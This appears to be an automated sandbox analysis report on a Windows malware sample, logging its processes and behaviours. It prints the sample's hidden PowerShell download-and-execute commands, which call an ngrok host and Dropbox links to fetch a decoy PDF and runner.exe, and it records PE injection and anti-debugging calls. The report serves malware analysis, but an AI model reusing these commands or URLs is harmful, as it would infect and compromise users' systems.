                      Source: 854113748.exe, 0000001A.00000000.2141795454.0000000000599000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.00000000025B6000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000000.2326600530.0000000000599000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: WFQEMU_
                      Source: fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                      Source: fontdrvhost.exe, 0000001E.00000002.2470274318.0000000003293000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHk(
                      Source: msedge.exe, 00000005.00000002.1924113982.000001DFF3245000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2139666120.0000018701245000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_006091B0 LdrInitializeThunk,VirtualFree,29_3_006091B0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004734E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_004734E6
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004150A0 GetModuleHandleW,LoadLibraryW,GetProcAddress,26_2_004150A0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_00609277 mov eax, dword ptr fs:[00000030h]29_3_00609277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 30_3_03220283 mov eax, dword ptr fs:[00000030h]30_3_03220283
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00474040 GetProcessHeap,HeapFree,26_2_00474040
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Users\user\AppData\Local\Temp\854113748.exe "C:\Users\user\AppData\Local\Temp\854113748.exe"
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004734E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_004734E6
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_004734E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_004734E6

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeMemory written: C:\Users\user\AppData\Local\Temp\854113748.exe base: 5D0000 value starts with: 4D5A
                      Maps a DLL or memory area into another process
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonlyJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1027599800.pdf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\854113748.exe "C:\Users\user\AppData\Local\Temp\854113748.exe"
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/lewis-silkin-llp.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -outfile $randomexe ; start $randomexe; iwr -uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/lewis-silkin-llp.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -outfile $randomexe ; start $randomexe; iwr -uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00502A5F cpuid 26_2_00502A5F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
